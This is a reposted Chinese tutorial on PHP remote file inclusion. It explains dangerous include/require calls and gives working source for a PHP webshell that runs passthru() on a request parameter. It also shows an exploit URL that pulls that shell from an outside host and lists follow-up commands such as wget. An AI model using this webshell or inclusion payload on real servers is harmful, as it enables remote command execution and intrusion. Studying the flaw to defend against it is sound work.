加入收藏 | 设为首页 | 会员中心 | 我要投稿 应用网_扬州站长网 (https://www.0514zz.com/)- 科技、建站、经验、云计算、5G、大数据,站长网!
当前位置: 首页 > 运营中心 > 交互 > 正文

PHP文件包含漏洞详解(1)

发布时间:2016-11-20 23:25:56 所属栏目:交互 来源:站长网
导读:副标题#e# 一、什么才是远程文件包含漏洞? 回答是:服务器通过php的特性(函数)去包含任意文件时,由于要包含的这个文件来源过滤不严,从而可以去包含一个恶意文件,而我们可以构造这个恶意文件来达到邪恶的目的。 涉及到的危险函数:include(),require()

2.远程文件包含可运行的PHP木马

如果目标主机的”allow_url_fopen”是激活的(默认是激活的,没几个人会修改),我们就可以有更大的利用空间,我们可以指定其它 URL上的一个包含PHP代码的webshell来直接运行,比如,我先写一段运行命令的PHP代码,如下保存为cmd.txt(后缀不重要,只要内容为 PHP格式就可以了)。

if (get_magic_quotes_gpc()){

$_REQUEST["cmd"]=stripslashes($_REQUEST["cmd"]);} //去掉转义字符(可去掉字符串中的反斜线字符)

ini_set(“max_execution_time”,0); //设定针对这个文件的执行时间,0为不限制.

echo ”M4R10开始行”; //打印的返回的开始行提示信息

passthru($_REQUEST["cmd"]); //运行cmd指定的命令

echo ”M4R10结束行”; //打印的返回的结束行提示信息

?>

以上这个文件的作用就是接受cmd指定的命令,并调用passthru函数执行,把内容返回在M4R10开始行与M4R10结束行之间。把这个文件 保存到我们主机的服务器上(可以是不支持PHP的主机),只要能通过HTTP访问到就可以了,例如地址如下:http://www.xxx.cn/cmd.txt,然后我们就可以在那个漏洞主机上构造如下URL来利用了:

http://hi.baidu.com/m4r10/php /index.php?page=http://www.xxx.cn/cmd.txt?cmd=ls

其中cmd后面的就是你需要执行的命令,其它常 用的命令(以*UNIX为例)如下:

ll 列目录、文件(相当于Windows下dir)

pwd 查看当前绝对路径

id whoami 查看当前用户

wget 下载指定URL的文件

等等其它的,你主机去BAIDU找吧,就不列举了。

(编辑:应用网_扬州站长网)

【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容!

热点阅读